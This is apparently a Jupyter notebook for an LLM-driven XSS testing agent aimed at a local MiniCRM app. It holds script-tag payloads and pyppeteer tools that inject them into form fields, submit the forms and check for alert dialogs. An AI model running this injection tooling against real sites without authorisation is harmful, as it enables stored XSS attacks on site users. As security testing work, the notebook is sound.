In [283]:
failed = {"data/extracted_task_workflows/Workflow_1.md":{'failed_steps':[1]},"data/extracted_task_workflows/Workflow_2.md":{'failed_steps':[]}}

In [294]:

import os
import shutil
from rich.panel import Panel
def copy_executable_workflow(workflow_path , executable_workflow_dir = "./data/executable_workflows" ):
    workflow = workflow_path.split("/")[-1]    
    executable_workflow_path = os.path.join(executable_workflow_dir  , workflow )
    shutil.copy(src=workflow_path , dst= executable_workflow_path)
    return executable_workflow_path


def clean_dir(executable_workflow_dir):
    dir_ops_logs = []

    if os.path.exists(executable_workflow_dir):
        for filename in os.listdir(executable_workflow_dir):
            file_path = os.path.join(executable_workflow_dir, filename)
            try:
                if os.path.isfile(file_path) or os.path.islink(file_path):
                    os.unlink(file_path)
                    dir_ops_logs.append(f"[green]Deleted file:[/green] {file_path}")
                elif os.path.isdir(file_path):
                    shutil.rmtree(file_path)
                    dir_ops_logs.append(f"[green]Deleted folder:[/green] {file_path}")
            except Exception as e:
                dir_ops_logs.append(f"[red]Failed to delete {file_path}. Reason: {e}[/red]")
    else:
        os.makedirs(executable_workflow_dir)
        dir_ops_logs.append(f"[cyan]Created directory:[/cyan] {executable_workflow_dir}")

    dir_panel = Panel("\n".join(dir_ops_logs) or "[yellow]No existing files to delete[/yellow]",
                      title="🗂️ Directory Cleanup", border_style="magenta")



def get_executable_workflows(failed , executable_workflow_dir = "./data/executable_workflows"):

    clean_dir(executable_workflow_dir)
    executable_workflows = []

    for k , _ in failed.items():
        if len(failed[k]["failed_steps"]) == 0:
            
            k = copy_executable_workflow(k)
            
            executable_workflows.append(k)



    return executable_workflows



In [295]:
get_executable_workflows(failed)

['./data/executable_workflows/Workflow_2.md']

In [281]:
copy_executable_workflow(workflow_path)

'./data/executable_workflows/Workflow_2.md'

In [3]:
def parse_form_fields(html):
    soup = BeautifulSoup(html, "html.parser")
    inputs = soup.find_all(['input', 'textarea'])

    # Collect fields with name and type
    field_info = []
    for tag in inputs:
        name = tag.get("name")
        if name:
            field_type = tag.get("type", "text")  # default to text if not specified
            tag_type = tag.name
            field_info.append({"name": name, "type": field_type, "tag": tag_type})
    return field_info


In [ ]:

async def fill_form_fields(page, values: dict):
    """
    Fill out and submit a form using parsed field names and user-provided values.
    Args:
        page: Pyppeteer page object
        values: Dict of field names and their values
    """
    
    
    xss_payload = "<script>alert('XSS')</script>"
    
    for field_name, field_value in values.items():
        
        
        field_value = xss_payload 
        selector = f'input[name="{field_name}"], textarea[name="{field_name}"], select[name="{field_name}"]'
        print(f"Filling: {selector} -> {field_value}")
        try:
            await page.waitForSelector(selector, timeout=2000)

            # Clear the input value using evaluate safely
            await page.evaluate(
                """(selector) => {
                    const el = document.querySelector(selector);
                    if (el) el.value = "";
                }""",
                selector
            )

            # Handle <select> separately if needed
            tag_name = await page.evaluate(
                """(selector) => {
                    const el = document.querySelector(selector);
                    return el ? el.tagName.toLowerCase() : null;
                }""",
                selector
            )

            if tag_name == "select":
                await page.select(selector, field_value)
            else:
                await page.type(selector, field_value)

        except Exception as e:
            print(f"⚠️ Failed to fill {field_name}: {e}")

    # Try to click the submit button
    try:
        submit_selectors = [
            'form button[type="submit"]',
            'form input[type="submit"]',
            'button[type="submit"]',
            'input[type="submit"]'
        ]
        for submit_selector in submit_selectors:
            try:
                await page.waitForSelector(submit_selector, timeout=1000)
                await page.click(submit_selector)
                await page.waitForNavigation(timeout=5000)
                print("✅ Form submitted.")
                return "✅ Form submitted."
            except:
                continue
        return "⚠️ No submit button found."
    except Exception as e:
        return f"⚠️ Failed to submit form: {e}"


In [296]:
async def XSS_injection_tool(state: dict, form_html: str, values: dict = None):
    """
    Fills out a form with an XSS payload (non-email fields) and submits it.
    Args:
        state: LangGraph agent state with a Puppeteer page
        form_html: HTML string of the form
        values: Optional dict to override the payloads
    """
    fields = parse_form_fields(form_html)
    filtered_values = {k: v for k, v in values.items() if k in fields}
    
    result = await fill_form_fields(state["page"], filtered_values)
    state["last_action"] = result
    return state

# state = await XSS_injection_tool.arun({
#     "state": state,
#     "form_html": form_html,
#     "values": values
# })



In [297]:

workflow_path = "data/extracted_task_workflows/Workflow_3.md"

with open( workflow_path,"r") as f:
    workflow = f.read()

In [298]:
workflow

'---\nTask: 4. Add a new contact by filling out and submitting the form on the contacts add page\nWorkflow:\nStep 1: Navigate to http://127.0.0.1:5000/dashboard\nStep 2: Click on the link that navigates to http://127.0.0.1:5000/contacts\nStep 3: Click on the link that navigates to http://127.0.0.1:5000/contacts/add\nStep 4: Fill out the form with the following details: \n    - action: /contacts/add\n    - method: POST\n    - inputs: \n        - name (text): the name of the new contact\n        - email (email): the email of the new contact\n        - notes (textarea): any notes about the new contact\nStep 5: Press the button to submit the form: \n    - type: submit\n    - text: Save Contact\nStep 6: Verify that the new contact has been added successfully and the page has navigated to one of the following URLs: http://127.0.0.1:5000/dashboard, http://127.0.0.1:5000/contacts, http://127.0.0.1:5000/tickets, or http://127.0.0.1:5000/admin'

In [299]:
import llm_bridge
llm = llm_bridge.Bridge()

visited_urls = ['http://127.0.0.1:5000/admin/settings', 'http://127.0.0.1:5000/contacts', 'http://127.0.0.1:5000/contacts/add', 'http://127.0.0.1:5000/dashboard', 'http://127.0.0.1:5000/tickets',
'http://127.0.0.1:5000/tickets/add']


prompt = f"""You are an webapp vulnerability security agent .
you have 2 tools one to inject XSS acript payload into html forms and one to check_the_XSS alert in the urls.. 
now you have the workflow for a successful task , all the links of a website and the tools.

YOUR GOAL : update the workflow such that it includes the 2 tools to check for vulonerability.

INSTRUCTIONS: 
1. Only write concise steps with the urls like the original workflow
2. make sure to write after 'updated_workflow'
3. No need to put submit form if filling form is already there ..
4. if filling form NO need for further verification of input details
5. if there is no html form filling not in workflow for xss exploit.. output only SKIP
6. for observing xss exploit try to check multiple related urls 

visited_urls
= {visited_urls}
old_workflow = {workflow}


updated_workflow = 
"""



response = llm.get_response(prompt = prompt)






In [300]:
exploit_workflow = response.choices[0].message.content

In [301]:
exploit_workflow

'updated_workflow\nStep 1: Navigate to http://127.0.0.1:5000/dashboard\nStep 2: Click on the link that navigates to http://127.0.0.1:5000/contacts\nStep 3: Click on the link that navigates to http://127.0.0.1:5000/contacts/add\nStep 4: Fill out the form with the following details: \n    - action: /contacts/add\n    - method: POST\n    - inputs: \n        - name (text): the name of the new contact\n        - email (email): the email of the new contact\n        - notes (textarea): any notes about the new contact\nStep 5: Inject XSS script payload into the form using the XSS injection tool\nStep 6: Press the button to submit the form: \n    - type: submit\n    - text: Save Contact\nStep 7: Check for XSS alert in the following URLs using the check_XSS tool: \n    - http://127.0.0.1:5000/dashboard\n    - http://127.0.0.1:5000/contacts\n    - http://127.0.0.1:5000/tickets\n    - http://127.0.0.1:5000/admin\nStep 8: Verify that the new contact has been added successfully and the page has navi

In [302]:
wf={}
# wf["task"] = exploit_workflow.split("Workflow")[0]

exploit_workflow = exploit_workflow.replace("updated_workflow" , "")
wf["workflow_steps"] = exploit_workflow.split("Step")





In [303]:
wf

{'workflow_steps': ['\n',
  ' 1: Navigate to http://127.0.0.1:5000/dashboard\n',
  ' 2: Click on the link that navigates to http://127.0.0.1:5000/contacts\n',
  ' 3: Click on the link that navigates to http://127.0.0.1:5000/contacts/add\n',
  ' 4: Fill out the form with the following details: \n    - action: /contacts/add\n    - method: POST\n    - inputs: \n        - name (text): the name of the new contact\n        - email (email): the email of the new contact\n        - notes (textarea): any notes about the new contact\n',
  ' 5: Inject XSS script payload into the form using the XSS injection tool\n',
  ' 6: Press the button to submit the form: \n    - type: submit\n    - text: Save Contact\n',
  ' 7: Check for XSS alert in the following URLs using the check_XSS tool: \n    - http://127.0.0.1:5000/dashboard\n    - http://127.0.0.1:5000/contacts\n    - http://127.0.0.1:5000/tickets\n    - http://127.0.0.1:5000/admin\n',
  ' 8: Verify that the new contact has been added successfully a

In [304]:
try:
    from langchain.tools import tool
except:
    !uv pip install langchain
# langgraph state variable (dict)

state = {
    "page" : None,  # Puppeteer page instance
    "home_url": None,
    "curr_url": None,
    "last_action": None,
    "history": [],
}

In [305]:
try:
    from pyppeteer import launch
except:
    !uv pip install pyppeteer

import asyncio

In [306]:
try:
    import langgraph
except:
    !uv pip install langgraph

In [307]:
home_url = "http://127.0.0.1:5000/"
test_url = "http://127.0.0.1:5000/contacts/add"
 
browser = await launch(headless=True, args=['--no-sandbox', '--disable-setuid-sandbox'])

page = await browser.newPage()
await page.goto(test_url, {'waitUntil': 'networkidle2'})
state['page'] = page


state["home_url"] = home_url
state["curr_url"] = page.url

In [308]:

@tool
async def navigate_to_link(state: dict, relative_url: str):
    """
    Navigate to a selected link (relative path like '/dashboard')
    Args:
        state (dict): Must contain a Puppeteer page object in `state["page"]`
        relative_url (str): e.g. '/dashboard'
    Returns:
        dict: Updated state with last action
    """
    page = state["page"]
    home_url = state["home_url"]

    # Construct absolute URL
    full_url = home_url.rstrip("/") + relative_url

    try:
        await page.goto(full_url, {'waitUntil': 'networkidle2'})
        state["curr_url"] = full_url
        state["last_action"] = f"✅ Navigated to {full_url}"
        return state
    except Exception as e:
        state["last_action"] = f"❌ Failed to navigate to {full_url}: {e}"
        return state



In [309]:

from bs4 import BeautifulSoup


@tool
async def click_button_by_html(state: dict, html_string: str) -> dict:
    """
    Extract button text from HTML and click it on the current page.
    Args:
        state (dict): Must contain a Puppeteer page object in `state["page"]`
        html_string (str): e.g. '<button type="submit">Save Contact</button>'
    Returns:
        dict: Updated state with last action
    """
    page = state["page"]

    # Extract visible text from the button HTML
    try:
        soup = BeautifulSoup(html_string, 'html.parser')
        target_text = soup.get_text(strip=True)
    except Exception as e:
        state["last_action"] = f"❌ Failed to parse HTML: {e}"
        return state

    # Search all clickable elements
    try:
        buttons = await page.querySelectorAll('button, input[type="button"], input[type="submit"], [onclick]')
        
        for button in buttons:
            text = await page.evaluate('(el) => el.innerText || el.value || el.getAttribute("onclick") || ""', button)
            if text and target_text.lower() in text.strip().lower():
                await button.click()
                state["last_action"] = f"✅ Clicked button with text: {text.strip()}"
                return state
        
        state["last_action"] = f"❌ No button found with text: {target_text}"
        return state
    except Exception as e:
        state["last_action"] = f"❌ Error while clicking button: {e}"
        return state

# await click_button_by_html(state , buttons)


In [310]:

def parse_form_fields(html):
    soup = BeautifulSoup(html, "html.parser")
    inputs = soup.find_all(['input', 'textarea'])
    field_names = [tag.get("name") for tag in inputs if tag.get("name")]
    return field_names
    

# use this to the the field values for prompt



async def fill_form_fields(page, values: dict):
    """
    Force-fill form fields with XSS payloads using Pyppeteer.
    """
    for field_name , field_value in values.items():
        
        
        if field_name == 'name':
            payload = "<script>alert('XSS Attack!');</script>"
            field_value = payload    
        
        selector = f'input[name="{field_name}"], textarea[name="{field_name}"]'
        
        
        print(selector, field_value)
        
        
        try:
            await page.waitForSelector(selector, timeout=2000)
            await page.evaluate(
                """(selector, value) => {
                    const el = document.querySelector(selector);
                    if (el) el.value = value;
                }""",
                selector,
                field_value
            )
            print(f"✅ Injected payload into {field_name}")
        except Exception as e:
            print(f"⚠️ Failed to inject into {field_name}: {e}")

    # Submit the form
    try:
        await page.click('button[type="submit"], input[type="submit"]')
        await asyncio.sleep(2)  # ⏳ Wait 2 seconds for JS/AJAX to run
        print("✅ Submit clicked (no navigation).")
        return "✅ Submit clicked (no navigation)."
    except Exception as e:
        print(f"⚠️ Failed to click submit: {e}")
        return f"⚠️ Failed to click submit: {e}"





In [311]:
@tool

async def XSS_injection_tool(state: dict, form_html: str, values: dict = None):
    """
    Fills out a form with an XSS payload (non-email fields) and submits it.
    Args:
        state: LangGraph agent state with a Puppeteer page
        form_html: HTML string of the form
        values: Optional dict to override the payloads
        
        vlaues format  = {  
                            name:abc,
                            email:xyv@mail.com ,
                            notes: dummy note
                            
                        }
    """
    # fields = parse_form_fields(form_html)
    fields = values
    filtered_values = {k: v for k, v in values.items() if k in fields}
    print(f"filtered_values : {filtered_values}")
    result = await fill_form_fields(state["page"], filtered_values)
    state["last_action"] = result
    return state


In [312]:
# import asyncio

# async def fill_form_fields(page, values: dict):
#     """
#     Force-fill form fields with XSS payloads using Pyppeteer.
#     """
#     for field_name in values:
#         selector = f'input[name="{field_name}"], textarea[name="{field_name}"]'
#         payload = "<script>alert('XSS Attack!');</script>"
#         print(selector, payload)
#         try:
#             await page.waitForSelector(selector, timeout=2000)
#             await page.evaluate(
#                 """(selector, value) => {
#                     const el = document.querySelector(selector);
#                     if (el) el.value = value;
#                 }""",
#                 selector,
#                 payload
#             )
#             print(f"✅ Injected payload into {field_name}")
#         except Exception as e:
#             print(f"⚠️ Failed to inject into {field_name}: {e}")

#     # Submit the form
#     try:
#         await page.click('button[type="submit"], input[type="submit"]')
#         await asyncio.sleep(2)  # ⏳ Wait 2 seconds for JS/AJAX to run
#         print("✅ Submit clicked (no navigation).")
#         return "✅ Submit clicked (no navigation)."
#     except Exception as e:
#         print(f"⚠️ Failed to click submit: {e}")
#         return f"⚠️ Failed to click submit: {e}"


In [313]:
@tool
async def check_XSS_alert(state: dict) -> str:
    """
    Checks if an alert (e.g., from an XSS payload) was triggered on the page.

    Returns:
        "✅ XSS alert triggered!" if dialog was observed,
        otherwise "❌ No XSS alert detected."
    """
    page = state["page"]
    xss_triggered = False

    async def handle_dialog(dialog):
        nonlocal xss_triggered
        xss_triggered = True
        print(f"⚠️ Detected alert with message: {dialog.message}")
        await dialog.dismiss()  # ✅ Await this

    page.once("dialog", handle_dialog)

    # Wait briefly to give time for the alert to appear
    try:
        await page.waitForNavigation(timeout=5000)
    except Exception as e:
        print(f"⚠️ Timeout waiting for potential alert: {e}")

    print("✅ XSS alert triggered!" if xss_triggered else "❌ No XSS alert detected.")
    return state


In [314]:


tools = [
    navigate_to_link,
    click_button_by_html,
    XSS_injection_tool,
    check_XSS_alert
]

state['tools'] = tools

In [315]:
prompt = f"""
You are a workflow planner agent.

## Objective:
You are given:
1. A workflow to complete.
2. A list of natural language steps that must be followed in sequence.
3. A list of available tools (functions) in JSON format — each tool has a name and a description.

Your job:
        - Match each step with the most appropriate tool.
        - Describe the specific action and **arguments/parameters** the tool should use.
        - Include details like which values are passed in (if relevant).
        - if there is a form to fill do not have a step to click button to subimt form as filling it would submit it automaticaly
        - DO NOT REPEAT SAME STEPS
        - if there are multiple steps in a singe step separate them into multiple steps 
        For example : verify using checkxss alert after navigating to one of the following URLs:
        http://127.0.0.1:5000/dashboard, http://127.0.0.1:5000/contacts, 
        separate this to 
        step :navigate_to_link http://127.0.0.1:5000/dashboard .
        step: verify using check_xss_alert , 
        step : navigate_to_link ://127.0.0.1:5000/contacts . 
        step : verify using check_xss_alert
        


## Steps:
{wf["workflow_steps"]}

## Input Values (e.g. for forms):
{wf.get("values", {})}

## Available Tools (in JSON):
{state["tools"]}

---

## Output format:
Produce a **single-line string**, no newlines. For each step, use this format:

`StepDescription -> ToolName -> DetailedAction`

Where:
- `StepDescription` is a natural language summary of the step.
- `ToolName` is the name of the tool to use.
- `DetailedAction` explains exactly what the tool should do, including what arguments or values are used (if applicable).

Separate each step with ` || ` (double pipe). Do not add newlines or extra commentary.

---

## Example Output:
Navigate to the contact creation page -> navigate_to_link -> Go to relative URL '/contacts/add' from base URL || Fill out the form with name, email, and notes -> form_filling_tool -> Fill 'name' with 'John Doe', 'email' with 'john@example.com', and 'notes' with 'New lead from campaign' || Click the submit button -> click_button_by_html -> Find and click button with text 'Save Contact' and type='submit'

Only return the result in the required format.
"""


prompt

'\nYou are a workflow planner agent.\n\n## Objective:\nYou are given:\n1. A workflow to complete.\n2. A list of natural language steps that must be followed in sequence.\n3. A list of available tools (functions) in JSON format — each tool has a name and a description.\n\nYour job:\n        - Match each step with the most appropriate tool.\n        - Describe the specific action and **arguments/parameters** the tool should use.\n        - Include details like which values are passed in (if relevant).\n        - if there is a form to fill do not have a step to click button to subimt form as filling it would submit it automaticaly\n        - DO NOT REPEAT SAME STEPS\n        - if there are multiple steps in a singe step separate them into multiple steps \n        For example : verify using checkxss alert after navigating to one of the following URLs:\n        http://127.0.0.1:5000/dashboard, http://127.0.0.1:5000/contacts, \n        separate this to \n        step :navigate_to_link http:/

In [316]:
import llm_bridge

llm = llm_bridge.Bridge()



response = llm.get_response(prompt)

In [317]:
toolflow = response.choices[0].message.content


In [318]:
toolflow

"Navigate to the dashboard page -> navigate_to_link -> Go to relative URL '/dashboard' from base URL || Navigate to the contacts page -> navigate_to_link -> Go to relative URL '/contacts' from base URL || Navigate to the add contact page -> navigate_to_link -> Go to relative URL '/contacts/add' from base URL || Fill out the form with name, email, and notes and inject XSS payload -> XSS_injection_tool -> Fill 'name' with 'the name of the new contact', 'email' with 'the email of the new contact', and 'notes' with 'any notes about the new contact' and inject XSS payload || Navigate to the dashboard page to check XSS alert -> navigate_to_link -> Go to relative URL '/dashboard' from base URL || Check for XSS alert -> check_XSS_alert -> Check if an alert was triggered on the page || Navigate to the contacts page to check XSS alert -> navigate_to_link -> Go to relative URL '/contacts' from base URL || Check for XSS alert -> check_XSS_alert -> Check if an alert was triggered on the page || Nav

In [319]:
tool_flow_list = toolflow.split("||")
tool_flow_list

["Navigate to the dashboard page -> navigate_to_link -> Go to relative URL '/dashboard' from base URL ",
 " Navigate to the contacts page -> navigate_to_link -> Go to relative URL '/contacts' from base URL ",
 " Navigate to the add contact page -> navigate_to_link -> Go to relative URL '/contacts/add' from base URL ",
 " Fill out the form with name, email, and notes and inject XSS payload -> XSS_injection_tool -> Fill 'name' with 'the name of the new contact', 'email' with 'the email of the new contact', and 'notes' with 'any notes about the new contact' and inject XSS payload ",
 " Navigate to the dashboard page to check XSS alert -> navigate_to_link -> Go to relative URL '/dashboard' from base URL ",
 ' Check for XSS alert -> check_XSS_alert -> Check if an alert was triggered on the page ',
 " Navigate to the contacts page to check XSS alert -> navigate_to_link -> Go to relative URL '/contacts' from base URL ",
 ' Check for XSS alert -> check_XSS_alert -> Check if an alert was trigge

In [320]:
tool_registry = {
    "navigate_to_link": navigate_to_link,
    "XSS_injection_tool": XSS_injection_tool,
    "click_button_by_html": click_button_by_html,
    "check_XSS_alert": check_XSS_alert,
}


# tools = [
#     navigate_to_link,
#     click_button_by_html,
#     XSS_injection_tool,
#     check_XSS_alert
# ]


In [321]:
import re


print(tool_flow_list)
parsed_plan = []
for s in tool_flow_list:
    parsed = {}

    match = re.match(r"^(.*?)\s*->", s)
    if match:
        step_description = match.group(1).strip()
        print(step_description)

    match = re.match(r"^[^>]*->\s*([^>]+?)\s*->", s)
    if match:
        tool_name = match.group(1).strip()
        print(tool_name)

    match = re.match(r"^[^>]*->[^>]*->\s*(.*)$", s)
    if match:
        action = match.group(1).strip()
        print(action)
        
    parsed['step'] = step_description
    parsed['tool'] = tool_name
    parsed['action'] = action

    parsed_plan.append(parsed)
    
    
    

["Navigate to the dashboard page -> navigate_to_link -> Go to relative URL '/dashboard' from base URL ", " Navigate to the contacts page -> navigate_to_link -> Go to relative URL '/contacts' from base URL ", " Navigate to the add contact page -> navigate_to_link -> Go to relative URL '/contacts/add' from base URL ", " Fill out the form with name, email, and notes and inject XSS payload -> XSS_injection_tool -> Fill 'name' with 'the name of the new contact', 'email' with 'the email of the new contact', and 'notes' with 'any notes about the new contact' and inject XSS payload ", " Navigate to the dashboard page to check XSS alert -> navigate_to_link -> Go to relative URL '/dashboard' from base URL ", ' Check for XSS alert -> check_XSS_alert -> Check if an alert was triggered on the page ', " Navigate to the contacts page to check XSS alert -> navigate_to_link -> Go to relative URL '/contacts' from base URL ", ' Check for XSS alert -> check_XSS_alert -> Check if an alert was triggered on 

In [322]:
parsed_plan

[{'step': 'Navigate to the dashboard page',
  'tool': 'navigate_to_link',
  'action': "Go to relative URL '/dashboard' from base URL"},
 {'step': 'Navigate to the contacts page',
  'tool': 'navigate_to_link',
  'action': "Go to relative URL '/contacts' from base URL"},
 {'step': 'Navigate to the add contact page',
  'tool': 'navigate_to_link',
  'action': "Go to relative URL '/contacts/add' from base URL"},
 {'step': 'Fill out the form with name, email, and notes and inject XSS payload',
  'tool': 'XSS_injection_tool',
  'action': "Fill 'name' with 'the name of the new contact', 'email' with 'the email of the new contact', and 'notes' with 'any notes about the new contact' and inject XSS payload"},
 {'step': 'Navigate to the dashboard page to check XSS alert',
  'tool': 'navigate_to_link',
  'action': "Go to relative URL '/dashboard' from base URL"},
 {'step': 'Check for XSS alert',
  'tool': 'check_XSS_alert',
  'action': 'Check if an alert was triggered on the page'},
 {'step': 'Navi

In [323]:
def get_json_from_output(text):
    match = re.search(r'```json\s*(\{.*?\})\s*```', text, re.DOTALL)

    if match:
        json_str = match.group(1)
        json_data = json.loads(json_str)
        print(json_data)
    else:
        print("No JSON found.")
    
    return json_data
content = await page.content()


In [324]:
from langchain_core.prompts import PromptTemplate
from langchain.chains import LLMChain
import json

# 1. Define your LLM
from langchain_groq import ChatGroq
from langchain.prompts import PromptTemplate
from langchain.chains import LLMChain
from dotenv import load_dotenv
import os

load_dotenv(dotenv_path="./.env")


GROQ_API_KEY = os.environ.get("GROQ_API_KEY")

# Groq model setup (e.g., Mixtral)
llm = ChatGroq(
    temperature=0,
    model_name="llama-3.3-70b-versatile",  # or gemma-7b-it, llama3-8b-8192
    groq_api_key=GROQ_API_KEY # or set via env variable
)









# 2. Define the agent's prompt
prompt = PromptTemplate.from_template("""
You are an automation agent. Your job is to decide which tool to use and what values to fill in, based on the page's HTML and the current step.

Available tools:
- navigate_to_link
- XSS_injection_tool
- click_button_by_html
- check_XSS_alert

Each tool has its own input format and make sure to adhere to these formats:
- navigate_to_link: {{ "relative_url": "..." }}
- XSS_injection_tool: {{ "form_html": "...", "values": {{ "name": "...", "email": "...", "notes": "..." }} }}
- click_button_by_html: {{ "button_html": "..." }}
- check_XSS_alert: {{ }}  // Use this after submitting a form with an XSS payload


Reply with a JSON object:
{{ "tool": "...", "tool_args": {{ ... }} }}



for example if the action requires xss tool
{{ "tool": "XSS_injection_tool", "tool_args": {{ "form_html": "...", "values": {{ "name": "John", "email": "john@example.com", "notes": "test" }} }} }}

only when filling form fill the empty values with some examples 


Step: {step_description}

Action for the agent to do : {step_action}
Current Page HTML:
{page_html}


- Choose the correct tool and provide only the **required minimal arguments**.
- Wrap the final output in **markdown-style fenced code block** with `json`, like this:
- fill the form values with dummy names

```json
```




""")






# 3. Wrap in LLMChain
agent = LLMChain(llm=llm, prompt=prompt)

# 4. Your function with the agent integrated
async def run_plan(parsed_plan, initial_page_html):
    state = {
        "home_url":"http://127.0.0.1:5000/",
        "page":page,
        "page_html": initial_page_html,
        "current_step": 0,
        "history": []
    }

    for idx, step_info in enumerate(parsed_plan):
        print(f"\n➡️ Step {idx+1}: {step_info['step']}")

        page_html = state["page_html"]
        step_description = step_info["step"]
        step_action =  step_info["action"]
        # 5. LLM agent input
        agent_input = {
            "page_html": page_html,
            "step_description": step_description,
            "step_action": step_action
            
        }

        # 6. Use LLM agent to choose tool and args
        # decision_raw = await agent.ainvoke(agent_input)
        # print(decision_raw)
        # decision = json.loads(decision_raw["text"]) 

        try:
            decision_raw = await agent.ainvoke(agent_input)
            print(f"AGENT OUTPUT : {decision_raw} \n\n")
             # assumes LLMChain returns text field
            
        except Exception as e:
            print(f"❌ Failed to get response from agent: {e}")
            break


        try:
            decision = get_json_from_output(decision_raw["text"]) 
            print(f" EXTRACTED JSON : {decision}")
        except Exception as e:
            print(f"❌ Failed to parse agent output: {e}")
        
        

        tool_name = decision.get("tool")
        tool_args = decision.get("tool_args", {})
        tool_args['state'] = state
        tool_func = tool_registry.get(tool_name)


        print(f"TOOL DETAILS : TOOL_NAME -> {tool_name} | TOOL_ARGS  -> {tool_args} | REGISTRY FUNC -> {tool_func} ")

        if tool_func is None:
            print(f"❌ Tool '{tool_name}' not found")
            break

        result = await tool_func.ainvoke(tool_args)
        new_page_html = result.get("new_page_html", page_html)
            
        
        
        
        try:
            print(f"🔧 Running tool: {tool_name}")
            
            result = await tool_func.ainvoke(tool_args)
            new_page_html = result.get("new_page_html", page_html)

        except Exception as e:
            print(f"❌ Error running tool: {e}")
            break

        # 7. Update state
        state["history"].append({
            "step": step_info["step"],
            "tool": tool_name,
            "args": tool_args,
            "result": result
        })
        state["page_html"] = new_page_html
        state["current_step"] += 1

    print("✅ All steps executed.")
    return state


In [325]:
state = await run_plan(parsed_plan, content)


➡️ Step 1: Navigate to the dashboard page
AGENT OUTPUT : {'page_html': '<!DOCTYPE html><html lang="en"><head>\n    <meta charset="UTF-8">\n    <title>MiniCRM</title>\n    <link rel="stylesheet" href="/static/style.css">\n</head>\n<body>\n    <header>\n        <h1>MiniCRM Dashboard</h1>\n        <nav>\n            <a href="/dashboard">🏠 Dashboard</a> |\n            <a href="/contacts">📇 Contacts</a> |\n            <a href="/tickets">🎫 Tickets</a> |\n            <a href="/admin">⚙️ Admin</a>\n        </nav>\n        <hr>\n    </header>\n\n    \n      \n    \n\n    <main>\n        \n<h2>➕ Add New Contact</h2>\n\n<form action="/contacts/add" method="post">\n    <label for="name">Name:</label><br>\n    <input type="text" name="name" required=""><br><br>\n\n    <label for="email">Email:</label><br>\n    <input type="email" name="email" required=""><br><br>\n\n    <label for="notes">Notes:</label><br>\n    <textarea name="notes" rows="4" cols="50"></textarea><br><br>\n\n    <button type="sub

In [242]:
state["page"]